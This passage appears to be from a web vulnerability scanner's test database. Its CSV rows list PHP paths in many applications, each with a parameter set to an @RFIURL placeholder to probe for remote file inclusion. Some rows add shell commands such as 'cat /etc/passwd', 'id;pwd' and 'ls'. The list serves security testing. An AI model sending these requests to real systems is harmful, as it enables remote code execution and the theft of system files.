"006005","5292","c","/upload.php?save_path=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"006006","5292","c","/upload/admin/frontpage_right.php?loadadminpage=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"006007","5292","c","/upload/top.php?maindir=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"006008","5292","c","/upload/xax/admin/modules/install_module.php?level=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"006009","5292","c","/upload/xax/admin/patch/index.php?level=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"006010","5292","c","/upload/xax/ossigeno/admin/install_module.php?level=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"006011","5292","c","/upload/xax/ossigeno/admin/uninstall_module.php?level=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"006012","5292","c","/upload_local.php?target=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"006013","5292","c","/upload_multi.php?target=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"006014","5292","c","/urlinn_includes/config.php?dir_ws=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"006015","5292","c","/user.php?caselist[bad_file.txt][path]=@RFIURL&command=cat%20/etc/passwd","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"006016","5292","c","/user_language.php?INDM=r3d.w0rm&language_dir=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"006017","5292","c","/user_new_2.php?home=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"006018","5292","c","/usr/extensions/get_calendar.inc.php?root_path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"006019","5292","c","/usr/extensions/get_infochannel.inc.php?root_path=@RFIURL?cmd=id;pwd","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"006020","5292","c","/usr/extensions/get_tree.inc.php?GLOBALS[\"root_path\"]=@RFIURL?cmd=id;pwd","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"006021","5292","c","/usr/extensions/get_tree.inc.php?GLOBALS[root_path]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"006022","5292","c","/utilitaires/gestion_sondage.php?repertoire_visiteur=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"006023","5292","c","/utilitaires/gestion_sondage.php?repertoire_visiteur=@RFIURL?&cmd=ls","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"006024","5292","c","/utils/class_HTTPRetriever.php?libcurlemuinc=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"006025","5292","c","/v-webmail/includes/mailaccess/pop3.php?CONFIG[pear_dir]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"006026","5292","c","/vCard/admin/define.inc.php?match=@RFIURL?&cmd=id","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"006027","5292","c","/vb/includes/functions.php?classfile=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"006028","5292","c","/vb/includes/functions_cron.php?nextitem=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"006029","5292","c","/vb/includes/functions_forumdisplay.php?specialtemplates=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"006030","5292","c","/vbgsitemap/vbgsitemap-config.php?base=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"006031","5292","c","/vbgsitemap/vbgsitemap-vbseo.php?base=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"006032","5292","c","/vedit/editor/edit_htmlarea.php?highlighter=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"006033","5292","c","/viart_cms-3.3.2/blocks/block_site_map.php?root_folder_path=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"006034","5292","c","/view.php?ariadne=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"006035","5292","c","/view.php?id=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"006036","5292","c","/view_func.php?i=@RFIURL&l=testfile.txt?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"006037","5292","c","/views/print/printbar.php?views_path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"006038","5292","c","/visible_count_inc.php?statitpath=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"006039","5292","c","/visitor.php?_SERVER[DOCUMENT_ROOT]=@RFIURL??","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"006040","5292","c","/volume.php?config[public_dir]=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"006041","5292","c","/vote.php?Madoa=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"006042","5292","c","/votebox.php?VoteBoxPath=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"006043","5292","c","/vp/configure.php?phpbb_root_path=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"006044","5292","c","/vwebmail/includes/mailaccess/pop3/core.php?CONFIG[pear_dir]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"006045","5292","c","/w-agora_path/add_user.php?bn_dir_default=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"006046","5292","c","/w-agora_path/create_forum.php?bn_dir_default=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"006047","5292","c","/w-agora_path/create_user.php?bn_dir_default=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"006048","5292","c","/w-agora_path/delete_notes.php?bn_dir_default=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"006049","5292","c","/w-agora_path/delete_user.php?bn_dir_default=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"006050","5292","c","/w-agora_path/edit_forum.php?bn_dir_default=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"006051","5292","c","/w-agora_path/mail_users.php?bn_dir_default=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"006052","5292","c","/w-agora_path/moderate_notes.php?bn_dir_default=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"006053","5292","c","/w-agora_path/reorder_forums.php?bn_dir_default=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"006054","5292","c","/wamp_dir/setup/yesno.phtml?no_url=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"006055","5292","c","/wapchat/src/eng.adCreate.php?sysFileDir=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"006056","5292","c","/wapchat/src/eng.adCreateSave.php?sysFileDir=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"006057","5292","c","/wapchat/src/eng.adDispByTypeOptions.php?sysFileDir=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"006058","5292","c","/wapchat/src/eng.createRoom.php?sysFileDir=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"006059","5292","c","/wapchat/src/eng.forward.php?sysFileDir=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"006060","5292","c","/wapchat/src/eng.pageLogout.php?sysFileDir=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"006061","5292","c","/wapchat/src/eng.resultMember.php?sysFileDir=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"006062","5292","c","/wapchat/src/eng.roomDeleteConfirm.php?sysFileDir=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"006063","5292","c","/wapchat/src/eng.saveNewRoom.php?sysFileDir=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"006064","5292","c","/wapchat/src/eng.searchMember.php?sysFileDir=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"006065","5292","c","/wapchat/src/eng.writeMsg.php?sysFileDir=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"006066","5292","c","/war.php?vwar_root=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"006067","5292","c","/war.php?vwar_root=@RFIURL?&cmd=ls","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"006068","5292","c","/warn.php?file=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"006069","5292","c","/watermark.php?GALLERY_BASEDIR=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"006070","5292","c","/wbxml/WBXML/Decoder.php?base_dir=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"006071","5292","c","/wbxml/WBXML/Encoder.php?base_dir=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"006072","5292","c","/web/Administration/Includes/configureText.php?path_prefix=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"006073","5292","c","/web/Administration/Includes/contentHome.php?path_prefix=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"006074","5292","c","/web/Administration/Includes/deleteContent.php?path_prefix=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"006075","5292","c","/web/Administration/Includes/deleteUser.php?path_prefix=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"006076","5292","c","/web/Administration/Includes/userHome.php?path_prefix=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"006077","5292","c","/web/BetaBlockModules//Module/Module.php?path_prefix=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"006078","5292","c","/web/BetaBlockModules/AboutUserModule/AboutUserModule.php?path_prefix=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"006079","5292","c","/web/BetaBlockModules/AddGroupModule/AddGroupModule.php?path_prefix=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"006080","5292","c","/web/BetaBlockModules/AddMessageModule/AddMessageModule.php?path_prefix=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"006081","5292","c","/web/BetaBlockModules/AudiosMediaGalleryModule/AudiosMediaGalleryModule.php?current_blockmodule_path@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"006082","5292","c","/web/BetaBlockModules/CustomizeUIModule/desktop_image.php?path_prefix=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"006083","5292","c","/web/BetaBlockModules/EditProfileModule/DynamicProfile.php?path_prefix=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"006084","5292","c","/web/BetaBlockModules/EditProfileModule/external.php?path_prefix=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"006085","5292","c","/web/BetaBlockModules/EnableModule/EnableModule.php?path_prefix=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"006086","5292","c","/web/BetaBlockModules/ExternalFeedModule/ExternalFeedModule.php?path_prefix=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"006087","5292","c","/web/BetaBlockModules/FlickrModule/FlickrModule.php?path_prefix=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"006088","5292","c","/web/BetaBlockModules/GroupForumModule/GroupForumModule.php?path_prefix@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"006089","5292","c","/web/BetaBlockModules/GroupForumPermalinkModule/GroupForumPermalinkModule.php?path_prefix=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"006090","5292","c","/web/BetaBlockModules/GroupModerateContentModule/GroupModerateContentModule.php?path_prefix=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"006091","5292","c","/web/BetaBlockModules/GroupModerateUserModule/GroupModerateUserModule.php?path_prefix=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"006092","5292","c","/web/BetaBlockModules/GroupModerationModule/GroupModerationModule.php?path_prefix=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"006093","5292","c","/web/BetaBlockModules/GroupsCategoryModule/GroupsCategoryModule.php?path_prefix=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"006094","5292","c","/web/BetaBlockModules/GroupsDirectoryModule/GroupsDirectoryModule.php?path_prefix=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"006095","5292","c","/web/BetaBlockModules/ImagesMediaGalleryModule/ImagesMediaGalleryModule.php?current_blockmodule_path@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"006096","5292","c","/web/BetaBlockModules/ImagesModule/ImagesModule.php?path_prefix=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"006097","5292","c","/web/BetaBlockModules/InvitationStatusModule/InvitationStatusModule.php?path_prefix=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"006098","5292","c","/web/BetaBlockModules/LargestGroupsModule/LargestGroupsModule.php?path_prefix=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"006099","5292","c","/web/BetaBlockModules/LinksModule/LinksModule.php?path_prefix=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"006100","5292","c","/web/BetaBlockModules/LoginModule/remoteauth_functions.php?path_prefix=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"006101","5292","c","/web/BetaBlockModules/LogoModule/LogoModule.php?path_prefix=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"006102","5292","c","/web/BetaBlockModules/MediaFullViewModule/MediaFullViewModule.php?path_prefix=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"006103","5292","c","/web/BetaBlockModules/MediaManagementModule/MediaManagementModule.php?path_prefix=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"006104","5292","c","/web/BetaBlockModules/MembersFacewallModule/MembersFacewallModule.php?current_blockmodule_path@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"006105","5292","c","/web/BetaBlockModules/MessageModule/MessageModule.php?path_prefix=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"006106","5292","c","/web/BetaBlockModules/ModuleSelectorModule/ModuleSelectorModule.php?path_prefix=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"006107","5292","c","/web/BetaBlockModules/MyGroupsModule/MyGroupsModule.php?path_prefix=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"006108","5292","c","/web/BetaBlockModules/MyLinksModule/MyLinksModule.php?path_prefix=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"006109","5292","c","/web/BetaBlockModules/MyNetworksModule.php?path_prefix=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"006110","5292","c","/web/BetaBlockModules/NetworkAnnouncementModule/NetworkAnnouncementModule.php?path_prefix=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"006111","5292","c","/web/BetaBlockModules/NetworkDefaultControlModule/NetworkDefaultControlModule.php?path_prefix=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"006112","5292","c","/web/BetaBlockModules/NetworkDefaultLinksModule/NetworkDefaultLinksModule.php?path_prefix=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"006113","5292","c","/web/BetaBlockModules/NetworkModerateUserModule/NetworkModerateUserModule.php?path_prefix=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"006114","5292","c","/web/BetaBlockModules/NetworkResultContentModule/NetworkResultContentModule.php?path_prefix=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"006115","5292","c","/web/BetaBlockModules/NetworkResultUserModule/NetworkResultUserModule.php?path_prefix=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"006116","5292","c","/web/BetaBlockModules/NetworksDirectoryModule/NetworksDirectoryModule.php?path_prefix=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"006117","5292","c","/web/BetaBlockModules/NewestGroupsModule/NewestGroupsModule.php?current_blockmodule_path@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"006118","5292","c","/web/BetaBlockModules/PeopleModule/PeopleModule.php?path_prefix=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"006119","5292","c","/web/BetaBlockModules/PopularTagsModule/PopularTagsModule.php?path_prefix=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"006120","5292","c","/web/BetaBlockModules/PostContentModule/PostContentModule.php?path_prefix=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"006121","5292","c","/web/BetaBlockModules/ProfileFeedModule/ProfileFeedModule.php?path_prefix=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"006122","5292","c","/web/BetaBlockModules/RecentCommentsModule/RecentCommentsModule.php?path_prefix=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"006123","5292","c","/web/BetaBlockModules/RecentPostModule/RecentPostModule.php?path_prefix=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"006124","5292","c","/web/BetaBlockModules/RecentTagsModule/RecentTagsModule.php?path_prefix=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"006125","5292","c","/web/BetaBlockModules/RegisterModule/RegisterModule.php?path_prefix=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"006126","5292","c","/web/BetaBlockModules/SearchGroupsModule/SearchGroupsModule.php?path_prefix=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"006127","5292","c","/web/BetaBlockModules/ShowAnnouncementModule/ShowAnnouncementModule.php?path_prefix=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"006128","5292","c","/web/BetaBlockModules/ShowContentModule/ShowContentModule.php?path_prefix=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"006129","5292","c","/web/BetaBlockModules/TakerATourModule/TakerATourModule.php?path_prefix=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"006130","5292","c","/web/BetaBlockModules/UploadMediaModule/UploadMediaModule.php?current_blockmodule_path@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"006131","5292","c","/web/BetaBlockModules/UserMessagesModule/UserMessagesModule.php?path_prefix=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"006132","5292","c","/web/BetaBlockModules/UserPhotoModule/UserPhotoModule.php?path_prefix=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"006133","5292","c","/web/BetaBlockModules/VideosMediaGalleryModule/VideosMediaGalleryModule.php?current_blockmodule_path@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"006134","5292","c","/web/BetaBlockModules/ViewAllMembersModule/ViewAllMembersModule.php?path_prefix=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"006135","5292","c","/web/Flickrclient.php?path_prefix=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"006136","5292","c","/web/help.php?LIBSDIR=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"006137","5292","c","/web/includes/blogger.php?path_prefix=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"006138","5292","c","/web/includes/functions/auto_email_notify.php?path_prefix=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"006139","5292","c","/web/includes/functions/html_generate.php?path_prefix=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"006140","5292","c","/web/includes/functions/validations.php?path_prefix=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"006141","5292","c","/web/index.php?LIBSDIR=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"006142","5292","c","/web/lib/xml/oai/ListRecords.php?xml_dir=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
